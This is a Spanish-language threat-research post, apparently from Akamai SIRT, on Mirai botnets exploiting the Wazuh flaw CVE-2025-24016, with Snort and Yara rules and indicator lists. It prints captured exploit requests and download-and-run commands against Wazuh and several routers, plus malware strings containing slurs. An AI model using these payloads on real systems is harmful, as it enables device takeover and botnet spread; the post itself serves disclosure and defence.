Dos botnets, una misma vulnerabilidad: Mirai se propaga a través de una vulnerabilidad de Wazuh
Todos los resultados de esta investigación se recopilaron a través de señuelos de SIRT y no se observaron en los terminales de producción reales de Wazuh que ejecutaban el software Wazuh.
ADVERTENCIA DE CONTENIDO: Algunas de las convenciones de nomenclatura que utilizan los atacantes a las que se hace referencia en este artículo incluyen insultos raciales y lenguaje explícito. No los hemos redactado con fines educativos y de descubrimiento. En ningún caso reflejan los valores o puntos de vista de Akamai.
Resumen ejecutivo
El equipo de respuesta e inteligencia en seguridad (SIRT) de Akamai ha identificado una explotación activa de la vulnerabilidad crítica de ejecución remota de código (RCE) CVE-2025-24016 contra los servidores de Wazuh (CVSS 9.9).
La vulnerabilidad aprovecha las solicitudes de API descentralizadas (DAPI), lo que permite a un atacante llevar a cabo la ejecución remota de código cargando un diccionario no saneado.
Hemos observado dos campañas de variantes de Mirai que explotan esta vulnerabilidad. Una de ellas, "Resbot", tiene nomenclatura italiana en sus dominios, lo que posiblemente alude a la geografía o el idioma objetivo hablado por el propietario del dispositivo afectado.
El SIRT de Akamai identificó por primera vez actividad en nuestra red global de señuelos en marzo de 2025. Se trata de la primera explotación activa notificada de esta vulnerabilidad desde su divulgación inicial en febrero de 2025.
Las botnets que explotan esta vulnerabilidad han aprovechado varias vulnerabilidades conocidas, incluidas CVE-2023-1389, CVE-2017-17215 y CVE-2017-18368, entre otras.
Hemos incluido una lista de indicadores de riesgo (IoC) al final de esta entrada de blog para ayudar en la defensa contra esta amenaza.
Introducción
El SIRT de Akamai observó intentos de explotación activos de CVE-2025-24016 a finales de marzo de 2025 en nuestro clúster de señuelos expuestos en Internet. El SIRT identificó dos botnets diferentes que explotaron esta vulnerabilidad para propagar variantes del malware Mirai a los sistemas de destino vulnerables.
¿Qué es CVE-2025-24016?
En febrero de 2025, CVE-2025-24016 se divulgó en el paquete de administrador de la solución de código abierto XDR y SIEM Wazuh. Afecta a las versiones de Wazuh 4.4.0 a 4.9.0, con una corrección publicada en la versión 4.9.1. La vulnerabilidad permite a un atacante remoto con acceso a API ejecutar código arbitrario en el servidor de destino con un archivo JSON malicioso.
En la API de Wazuh, los parámetros de DistributedAPI se serializan como JSON y, a continuación, se deserializan mediante as_Wazuh_object en el archivo framework/wazuh/core/cluster/common.py. Esto se puede explotar inyectando un diccionario no saneado en las solicitudes DAPI, lo que puede llevar a la evaluación de código Python arbitrario.
A finales de febrero de 2025, una prueba de concepto (PoC) detalló cómo lograr la RCE con esta vulnerabilidad. La RCE se puede activar mediante el terminal run_as, lo que permite al atacante controlar el argumento auth_context. En la PoC, el autor lo demuestra con una solicitud de Burp Suite al URI /security/user/authenticate/run_as (Figura 1).
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-
encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}
Fig. 1: Solicitud de Burp Suite (Fuente: https://github.com/MuhammadWaseem29/CVE-2025-24016)
El encabezado de autorización está codificado en Base64 y la carga útil maliciosa contiene la excepción no saneada __unhandled_exc__, que activa la ejecución de código Python arbitrario, que en este caso es exit.
Explotación activa
Tan solo unas semanas después de su divulgación, a principios de marzo de 2025, el SIRT de Akamai descubrió intentos de explotar esta vulnerabilidad de Wazuh en nuestra red global de señuelos. Este es el último ejemplo de los plazos de explotación cada vez más reducidos que los operadores de botnets han adoptado para las CVE recién publicadas.
La autorización de encabezado codificado en Base64 decodifica en wazuh-wui:MyS3cr37P450r.*-, que es idéntica a la autorización en la explotación de PoC (Figura 2). El terminal y la estructura de solicitudes coinciden con la explotación de PoC, pero aquí se utiliza para propagar malware.
/security/user/authenticate/run_as {"__unhandled_exc__":{"__args__":["wget http://176.65.134[.]62/w.sh -O /tmp/temp_script.sh || curl -o /tmp/temp_script.sh http://176.65.134[.]62/w.sh; sh /tmp/temp_script.sh"],"__class__":"os.system"}}
Header Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
Fig. 2: El intento de explotación n.º 1 es idéntico al de la PoC
Además, a principios de mayo de 2025 detectamos solicitudes con una estructura similar dirigidas al punto final /Wazuh, que es diferente del terminal de destino estándar para esta vulnerabilidad (Figura 3). Como las solicitudes son casi idénticas a la de PoC, aparte del terminal, es probable que la botnet siga intentando explotar la misma vulnerabilidad de Wazuh.
/wazuh {"__unhandled_exc__": {"__class__": "os.system", "__args__": ["wget http://104.168.101[.]27/sh -O- | sh"]}}
Header Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
Fig. 3: El intento de explotación n.º 2 es diferente al de la PoC
Botnet 1: Múltiples variantes de Mirai
La explotación activa observada de esta vulnerabilidad de Wazuh está relacionada con dos botnets independientes. La primera botnet está conectada a los primeros intentos a principios de marzo de 2025, en los que la explotación recupera y ejecuta un script de shell malicioso que sirve como descarga de la carga útil principal de malware Mirai (Figura 4). De forma similar a los scripts de shell promedio que a menudo vemos con Mirai, admite una variedad de arquitecturas diferentes para dirigirse principalmente a los dispositivos del Internet de las cosas (IoT).
"busybox wget http://176.65.134[.]62/bins/morte.arm; chmod 777 morte.arm; ./morte.arm morte.arm",
"busybox wget http://176.65.134[.]62/bins/morte.arm5; chmod 777 morte.arm5; ./morte.arm5 morte.arm5",
"busybox wget http://176.65.134[.]62/bins/morte.arm6; chmod 777 morte.arm6; ./morte.arm6 morte.arm6",
"busybox wget http://176.65.134[.]62/bins/morte.arm7; chmod 777 morte.arm7; ./morte.arm7 morte.arm7",
"busybox wget http://176.65.134[.]62/bins/morte.i686; chmod 777 morte.i686; ./morte.i686 morte.i686",
"busybox wget http://176.65.134[.]62/bins/morte.m68k; chmod 777 morte.m68k; ./morte.m68k morte.m68k",
"busybox wget http://176.65.134[.]62/bins/morte.mips; chmod 777 morte.mips; ./morte.mips morte.mips",
"busybox wget http://176.65.134[.]62/bins/morte.mpsl; chmod 777 morte.mpsl; ./morte.mpsl morte.mpsl",
"busybox wget http://176.65.134[.]62/bins/morte.ppc; chmod 777 morte.ppc; ./morte.ppc morte.ppc",
"busybox wget http://176.65.134[.]62/bins/morte.sh4; chmod 777 morte.sh4; ./morte.sh4 morte.sh4",
"busybox wget http://176.65.134[.]62/bins/morte.spc; chmod 777 morte.spc; ./morte.spc morte.spc",
"busybox wget http://176.65.134[.]62/bins/morte.x86; chmod 777 morte.x86; ./morte.x86 morte.x86",
"busybox wget http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x64",
"rm $0"
Fig. 4: Contenido del script de shell w.sh
Estas muestras de malware Mirai, llamadas "morte", parecen ser variantes de Mirai LZRD, que han estado presentes durante algún tiempo. Se pueden distinguir fácilmente por la cadena única integrada como parte del código que imprimen en la consola de una máquina de destino tras su ejecución: "lzrd here".
Dominios asociados observados
El análisis de la dirección IP 176.65.134[.]62 dio como resultado una resolución a un dominio de mando y control (C2) de nuklearcnc.duckdns[.]org. Es importante señalar que el DNS de Duck es un servidor de DNS dinámico, y solo este subdominio en particular es malicioso aquí.
Este dominio también se resolvió a 176.65.142.252 alrededor de un marco de tiempo similar. Esa IP se resolvió a otro dominio de C2 llamado cbot.galaxias[.]cc. A través de VirusTotal pudimos encontrar lo que parece ser una RAT basada en Windows que se disfraza como el proceso svchost de Windows, y vuelve de nuevo al subdominio cbot.galaxias[.]cc para C2.
Otro subdominio, neon.galaxias[.]cc, tenía lo que parecía ser una distribución más estándar de la variante de Mirai y la comunicación asociada con ella. Una de sus direcciones IP de resolución, 209.141.34[.]106, también se resolvió a otros dos dominios de C2: pangacnc[.]com y jimmyudp-raw[.]xyz.
El dominio jimmyudp-raw[.]xyz tenía tres muestras de malware Mirai diferentes en VirusTotal. La primera, llamada "neon", es una variante de Mirai no identificada que se conectaba a 65.222.202[.]53 a través del puerto 80 para la comunicación de C2, y contenía la cadena de la consola integrada como parte del código "fuck u nigga".
La segunda, llamada "k03ldc", parece ser una versión modificada o actualizada de la variante de Mirai V3G4. Contiene la cadena de la consola integrada como parte del código "6666V3G4-Katana999" y se conecta a 196.251.86[.]49 a través del puerto 36063 para la comunicación de C2.
Finalmente, la tercera muestra, llamada "KKveTTgaAAsecNNaaaa", es la variante original de Mirai V3G4. El malware se conecta a 209.141.34[.]106 a través del puerto 60195 para la comunicación de C2 y utiliza la cadena integrada como parte del código "xXxSlicexXxxVEGA" tras la infección. Reconoce si un equipo de destino ya está infectado por la variante V3G4 y, si es así, imprimirá "We got this shit already" en lugar de la impresión típica.
El dominio pangacnc[.]com tenía dos muestras de malware Mirai diferentes en VirusTotal, y una era el malware denominado "KKveTTgaAAsecNNaaaa", que es idéntico al mencionado anteriormente. El otro se llamaba "vision", y es una variante de Mirai LZRD que se conecta a 65.222.202[.]53 a través del puerto 80, al igual que la muestra "neon" del otro dominio de C2. Esto alude a la posibilidad de que el malware de Mirai llamado "neon" sea una versión modificada de la variante LZRD.
Otras vulnerabilidades explotadas
Además de dirigirse a la RCE de Wazuh, observamos que esta botnet intentaba explotar otras vulnerabilidades conocidas. Esto incluía varias vulnerabilidades que hemos observado que se explotaban (Figura 5, Figura 6 y Figura 7) y que se han documentado en entradas anteriores de blog.
/ws/v1/cluster/apps {"application-id": "application_1404198295326_0003", "application-name": "get-shell", "am-container-spec": {"commands": {"command": "wget http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x86_64; rm -rf morte.x64; curl -O http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x86_64; rm -rf morte.x64"}}, "application-
Fig. 5: Vulnerabilidad Hadoop YARN
/cgi-bin/luci/;stok=/locale?form=country operation=write&country=$(id>cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://176.65.134[.]62/update.sh; curl -O http://176.65.134[.]62/update.sh; chmod 777 update.sh; sh update.sh; tftp 176.65.134[.]62 -c get tupdate.sh; chmod 777 tupdate.sh; sh tupdate.sh; tftp -r tupdate2.sh -g 176.65.134[.]62; chmod 777 tupdate2.sh; sh tupdate2.sh; ftpget -v -u anonymous -p anonymous -P 21 176.65.134[.]62 update1.sh update1.sh; sh update1.sh; rm -rf update.sh tupdate
Fig. 6: Inyección de comandos de TP-Link Archer AX21 (consulte https://nvd.nist.gov/vuln/detail/cve-2023-1389)
/manager_dev_ping_t.gch cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.34[.]106/1.sh; curl -O http://209.141.34[.]106/1.sh; chmod 777 1.sh; sh 1.sh; tftp 209.141.34[.]106 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 209.141.34[.]106; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.34[.]106 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3
Fig. 7: Explotación de RCE del router ZTE ZXV10 H108L (consulte https://github.com/stasinopoulos/ZTExploit/blob/master/ZTExploit_Source/ztexploit.py)
Botnet 2: Botnet Resbot/Resentual
La segunda botnet que identificamos fue la de los intentos en el terminal /Wazuh a principios de mayo de 2025. De forma similar a la primera explotación, también recupera y ejecuta un script de shell malicioso que sirve como descarga de Mirai. El malware, llamado "resgod", se identifica a través de su cadena de la consola integrada como parte del código "Resentual got you!". Al igual que la primera botnet, la carga útil se dirige a una amplia variedad de arquitecturas dirigidas a dispositivos IoT.
Una de las cosas interesantes que observamos sobre esta botnet fue el lenguaje asociado. Utilizaba una variedad de dominios para propagar el malware, y todos tenían nomenclatura italiana. Dominios como "gestisciweb.com", por ejemplo, se traducen aproximadamente como "gestionar web".
Se parecen a los nombres de dominio maliciosos que a menudo se utilizan para ataques de phishing porque parecen mucho más legítimos que sus "resbot.online" de C2 (que se ve más claramente como un dominio malicioso). Las convenciones de nomenclatura lingüística podrían indicar una campaña dirigida en particular a los dispositivos que son propiedad de los usuarios de habla italiana y los ejecutan.
Parece que las cadenas de la muestra no están cifradas y muestran una variedad de capacidades de análisis y explotaciones adicionales. La dirección IP 104.168.101[.]27 está integrada como parte del código en el malware y se utiliza como servidor de C2 a través del puerto TCP 62627 (uno de los posibles puertos de C2). Además, hemos descubierto que esta botnet intenta propagarse a través de FTP mediante el puerto 21 y realiza un análisis telnet.
Las diferentes explotaciones integradas como parte del código se pueden ver en la Figura 8, la Figura 9, la Figura 10 y la Figura 11.
POST /ctrlt/DeviceUpgrade_1 HTT
P/1.1\r\nContent-Length: 440\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthori
zation: Digest username="dslf-config", realm="HuaweiHomeGateway",
nonce="88645ce
fb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1",
response="3612f843a42d
b38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001,
cnonce="248d1a2
560100669"\r\n\r\n<?xml version="1.0" ?><s:Envelope
xmlns:s="http://schemas.xmls
oap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encodin
g/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-
org:service:WANPPPConnection:1"
><NewStatusURL>$(/bin/busybox wget -g 104.168.101[.]27 -l /tmp/.kx -r
/resgod.mips
; /bin/busybox chmod +x /tmp/.kx; /tmp/.kx selfrep.huawei)</NewStatusURL>.
<NewDow
nloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade>.
</s:Body></s:Envelope>\r
\n\r\n\r\n
Fig. 8: RCE del router Huawei HG532 (consulte https://nvd.nist.gov/vuln/detail/cve-2017-17215)
POST /picsdesc.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding//%22%3E<s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://104.168.101[.]27/resgod.mips; chmod 777 resgod.mips; ./resgod.mips selfrep.realtek</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n
Fig. 9: RCE de Realtek SDK Miniigd UPnP SOAP (consulte https://www.google.com/url?q=https://nvd.nist.gov/vuln/detail/cve-2014-8361&sa=D&source=docs&ust=1748461205172738&usg=AOvVaw2FtzN61mQxXkxEWnb9gb05)
POST /cgi-bin/ViewLog.asp HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 176\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://104.168.101[.]27/resgod.arm7;chmod+777+resgodarm7;./resgodarm7;rm+-rf+resgod.arm7%3b%23&remoteSubmit=Save\r\n\r\n
Fig. 10: Inyección de comandos del router TrueOnline ZyXEL P660HN-T v1 (consulte https://nvd.nist.gov/vuln/detail/cve-2017-18368)
&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=$(echo -e "wget http://104.168.101[.]27/sh" >> /tmp/.res) HTTP/1.0
Fig. 11: Propagación a través de FTP
Conclusión
La propagación de Mirai continúa relativamente sin cesar, ya que sigue siendo bastante sencillo reacondicionar y reutilizar código fuente antiguo para configurar o crear nuevas botnets. Además, los operadores de botnets suelen tener éxito simplemente aprovechando las explotaciones publicadas recientemente.
Aunque el programa CVE es, en general, un beneficio neto para el sector, a veces puede ser un arma de doble filo, ya que arroja luz sobre vulnerabilidades que, de otro modo, los actores malintencionados podrían haber pasado por alto.
Los intentos de los investigadores de educar a las organizaciones sobre la importancia de las vulnerabilidades mediante la creación de PoC siguen dando lugar a resultados dañinos, lo que demuestra lo apremiante que es mantenerse al día con la aplicación de los parches cuando se publican. Los operadores de botnets mantienen un seguimiento de algunas de estas divulgaciones de vulnerabilidades y, especialmente en los casos en los que las PoC se ponen a disposición del público general, adaptarán rápidamente el código de las PoC para que proliferen sus botnets.
A diferencia de otras vulnerabilidades de las que hemos informado recientemente, que a menudo solo afectan a los dispositivos retirados, CVE-2025-24016 afecta a los servidores Wazuh activos que ejecutan versiones obsoletas. Se recomienda encarecidamente aplicar un parche a la versión más reciente que contenga una corrección; en este caso, Wazuh versión 4.9.1 o posterior. Wazuh ha publicado una guía sobre cómo proteger correctamente los sistemas; si se sigue esa guía, esta campaña no debería suponer ningún problema.
Información actualizada con Akamai
El SIRT de Akamai seguirá supervisando amenazas similares e informando sobre ellas tanto a nuestros clientes como a la comunidad de seguridad en general. Para mantenerse al día con el SIRT y otras publicaciones del grupo de inteligencia de seguridad de Akamai, consulte nuestra página de investigación y síganos en las redes sociales.
IoC
Hemos incluido una lista de IOC, así como las reglas de Snort y Yara, para ayudar a los expertos en protección.
Reglas de Snort para los IOC de red
Reglas de Snort para direcciones IP de C2 (botnet n.º 1)
alert ip any any -> [209.141.34.106, 176.65.142.137, 65.222.202.53, 196.251.86.49, 176.65.134.62] any (
msg:"Possible Botnet C2 Infrastructure Activity - Suspicious IP";
sid:2000001;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
Reglas de Snort para la detección de resoluciones de dominio de C2 (botnet n.º 1)
alert http any any -> [nuklearcnc.duckdns.org, jimmyudp-raw.xyz, pangacnc.com, neon.galaxias.cc, cbot.galaxias.cc] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000002; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
Reglas de Snort para direcciones IP de C2 (botnet n.º 2)
alert ip any any -> [104.168.101.27, 104.168.101.23, 79.124.40.46, 194.195.90.179] any (
msg:"Possible Botnet C2 Infrastructure Activity - Suspicious IP";
sid:2000003;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
Reglas de Snort para la detección de resoluciones de dominio de C2 (botnet n.º 2)
alert http any any -> [resbot.online, versioneonline.com, web-app-on.com, assicurati-con-linear.online, webdiskwebdisk.webprocediweb.com, continueoraweb.com, ora-0-web.com, adesso-online.com, multi-canale.com, eversioneweb.com, gestisciweb.com] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000004; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
Reglas de Yara para muestras de malware (botnet n.º 1)
rule Mirai_Malware_IOCs_1
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware"
author = "Akamai SIRT"
date = "2025-05-16"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$lzrd = "LZRD"
$fucku = "fuck u nigga"
$vega = "xXxSlicexXxxVEGA"
$we_got_this = "We got this shit already"
$katana = "666V3G4-Katana999"
$ip1 = "209.141.34.106"
$ip2 = "176.65.142.137"
$ip3 = "65.222.202.53"
$ip4 = "196.251.86.49"
$ip5 = “176.65.134.62”
$domain1 = "nuklearcnc.duckdns.org"
$domain2 = "jimmyudp-raw.xyz"
$domain3 = "pangacnc.com"
$domain4 = "neon.galaxias.cc"
$domain5 = "cbot.galaxias.cc"
$hash1 = "dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9"
$hash2 = "7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549"
$hash3 = "64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f"
$hash4 = "4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed"
$hash5 = "811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc"
$hash6 = "90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353"
$hash7 = "8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6"
$hash8 = "c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1"
$hash9 = "6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a"
condition:
(
$lzrd or
$fucku or
$vega or
$we_got_this or
$katana or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$ip5 or
$domain1 or
$domain2 or
$domain3 or
$domain4 or
$domain5 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6 or
$hash7 or
$hash8 or
$hash9
)
}
Reglas de Yara para muestras de malware (botnet n.º 2)
rule Mirai_Malware_IOCs_2
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware."
author = "Akamai SIRT"
date = "2025-05-16"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$resentual = "Resentual got you"
$ip1 = "104.168.101.27"
$ip2 = "104.168.101.23"
$ip3 = "79.124.40.46"
$ip4 = "194.195.90.179"
$domain1 = "resbot.online"
$domain2 = "versioneonline.com"
$domain3 = "web-app-on.com"
$domain4 = "Assicurati-con-linear.online"
$domain5 = "webdiskwebdisk.webprocediweb.com"
$domain6 = "continueoraweb.com"
$domain7 = "ora-0-web.com"
$domain8 = "adesso-online.com"
$domain9 = "multi-canale.com"
$domain10 = "eversioneweb.com"
$domain11 = "gestisciweb.com"
$hash1 = "9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b"
$hash2 = "be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0"
$hash3 = "e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0"
$hash4 = "4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6"
$hash5 = "a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc"
$hash6 = "941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549"
condition:
(
$resentual or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$domain1 or
$domain2 or
$domain3 or
$domain4 or
$domain5 or
$domain6 or
$domain7 or
$domain8 or
$domain9 or
$domain10 or
$domain11 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6
)
}
Direcciones IPv4 maliciosas (botnet n.º 1)
209.141.34.106
176.65.142.137
65.222.202.53
196.251.86.49
176.65.134.62
Dominios maliciosos (botnet n.º 1)
nuklearcnc.duckdns[.]org
jimmyudp-raw[.]xyz
pangacnc[.]com
neon.galaxias[.]cc
cbot.galaxias[.]cc
Direcciones IPv4 maliciosas (botnet n.º 2)
104.168.101.27
104.168.101.23
79.124.40.46
194.195.90.179
Dominios maliciosos (botnet n.º 2)
resbot[.]online
versioneonline[.]com
web-app-on[.]com
Assicurati-con-linear[.]online
webdiskwebdisk.webprocediweb[.]com
continueoraweb[.]com
ora-0-web[.]com
adesso-online[.]com
multi-canale[.]com
eversioneweb[.]com
gestisciweb[.]com
Hashes SHA256 (botnet n.º 1)
dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9
7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549
64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f
4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed
811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc
90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353
8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6
c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1
6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a
Hashes SHA256 (botnet n.º 2)
9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b
be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0
e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0
4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6
a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc
941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549
